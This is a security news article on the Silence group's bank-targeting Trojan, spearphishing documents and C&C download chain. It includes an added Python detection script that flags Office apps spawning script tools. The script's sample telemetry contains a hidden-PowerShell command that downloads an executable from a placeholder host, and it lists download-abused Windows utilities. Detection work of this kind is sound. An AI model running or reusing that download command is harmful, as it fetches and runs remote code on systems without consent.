Russian hackers silently threaten global financial organisations


A new bankrobber Trojan has been identified by researchers at Kaspersky Lab, quietly stealing money direct from the banks themselves rather than targeting customers.

The advanced persistent threat is ongoing, and is the work of Russian-speaking newcomers to the scene called the Silence group. The Silence Trojan itself is similar in many ways to the now infamous Carbanak threat that relieved banks of more than a billion dollars between 2013 and 2015. The similarity is not just in the ties to Russia, but also in the attack methodology applied.

According to Kaspersky Lab, Silence looks to gain persistent access to internal banking networks over a lengthy period of time, during which day-to-day activity on the network can be monitored. The precise nature of each separate bank network infected is explored, and the Trojan waits for the optimal moment to attack using the intelligence gained.

This intelligence is sourced by such methods as taking multiple screenshots of active screens in order to produce a real-time video stream of internal banking network activity.

The initial compromise is by way of a targeted spearphishing campaign, which uses infected documents. The documents themselves are fairly sophisticated, however, both in appearance and execution: one click initiates a download chain ending in the execution of the dropper, which connects to the C&C servers. Finally, malicious payloads are downloaded and executed for each specific task, such as screen recording and credential theft.
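The chain described above (a malicious document, a download stage, then a dropper that calls out to C&C) leaves a recognisable trace in endpoint telemetry: an Office application becomes the ancestor of a scripting or download utility. The following is an added, defender-side example written for this page; it is not Kaspersky Lab's code nor anything from the Silence group. The event format, the process names and the sample telemetry are all constructed assumptions, chosen to look like process-creation logs from an EDR or Sysmon-style source.

```python
"""Flag script/download tools whose process ancestry includes an Office app.

Added example for this article. Event schema and sample data are constructed
(hypothetical); adapt `ProcEvent` to whatever your telemetry actually provides.
"""
import os
from dataclasses import dataclass
from typing import Dict, List

# Parents typically abused by document-borne spearphishing.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children commonly used to fetch and run a second stage.
SCRIPT_TOOLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "certutil.exe", "bitsadmin.exe", "rundll32.exe"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path as logged
    cmdline: str
    user: str


# Constructed sample telemetry (not from any real incident).
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe", r"CORP\teller01"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\WINWORD.EXE",
              r'"WINWORD.EXE" /n "C:\Users\teller01\Downloads\invoice.docx"', r"CORP\teller01"),
    ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c start /min powershell -w hidden -f C:\Users\teller01\AppData\Local\Temp\s.ps1",
              r"CORP\teller01"),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -w hidden -c Invoke-WebRequest http://stage.example.invalid/2 -OutFile $env:TEMP\u.exe",
              r"CORP\teller01"),
    # Benign: an admin opening a shell directly from the desktop.
    ProcEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe", r"CORP\teller01"),
    ProcEvent(600, 100, r"C:\Program Files\Google\Chrome\chrome.exe", "chrome.exe", r"CORP\teller01"),
]


def basename(image: str) -> str:
    """Normalise a Windows image path to a lowercase file name."""
    return os.path.basename(image.replace("\\", "/")).lower()


def index_by_pid(events: List[ProcEvent]) -> Dict[int, ProcEvent]:
    return {e.pid: e for e in events}


def ancestry(pid: int, index: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Return the process followed by its ancestors, nearest first.

    Guards against PID reuse loops in noisy telemetry.
    """
    chain: List[ProcEvent] = []
    seen = set()
    cur = index.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = index.get(cur.ppid)
    return chain


def find_office_spawned_tools(events: List[ProcEvent]) -> List[dict]:
    """One alert per script/download tool that descends from an Office app.

    The alert carries the full image chain from the Office parent down to the
    tool, and whether the tool's command line references a URL (download stage).
    """
    index = index_by_pid(events)
    alerts: List[dict] = []
    for ev in events:
        if basename(ev.image) not in SCRIPT_TOOLS:
            continue
        lineage = ancestry(ev.pid, index)
        for depth, anc in enumerate(lineage[1:], start=1):
            if basename(anc.image) in OFFICE_APPS:
                chain = [basename(p.image) for p in reversed(lineage[:depth + 1])]
                alerts.append({
                    "pid": ev.pid,
                    "office_pid": anc.pid,
                    "user": ev.user,
                    "chain": chain,
                    "fetches_url": "http" in ev.cmdline.lower(),
                })
                break  # nearest Office ancestor is enough for one alert
    return alerts


if __name__ == "__main__":
    for alert in find_office_spawned_tools(SAMPLE_EVENTS):
        print(alert)
```

Walking the ancestry rather than checking only the direct parent matters here: the sample dropper runs one hop removed from Word (Word starts cmd.exe, which starts PowerShell), so a parent-only rule would miss the stage that actually reaches out to the network. The `fetches_url` field is what separates the download stage from the intermediate shell when triaging.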

All of which sounds like we've been here before, not just with Carbanak but with a myriad of other malware threats. Even the fact that Silence exploits the infrastructure of already infected financial institutions to launch new attacks, using compromised bank employee email accounts, is old hat as far as threat activity is concerned.

Which begs the question: why have multiple financial organisations fallen victim to the Silence group? Kaspersky researchers suggest "at least 10" across multiple regions have been hit so far, and the attacks are ongoing.

Sergey Lozhkin, security expert at Kaspersky Lab, says that "the most worrying thing here is that due to their in-the-shadow approach, these attacks may succeed regardless of the peculiarities of each bank's security architecture."

This article originally appeared at scmagazineuk.com

Copyright © SC Magazine, UK edition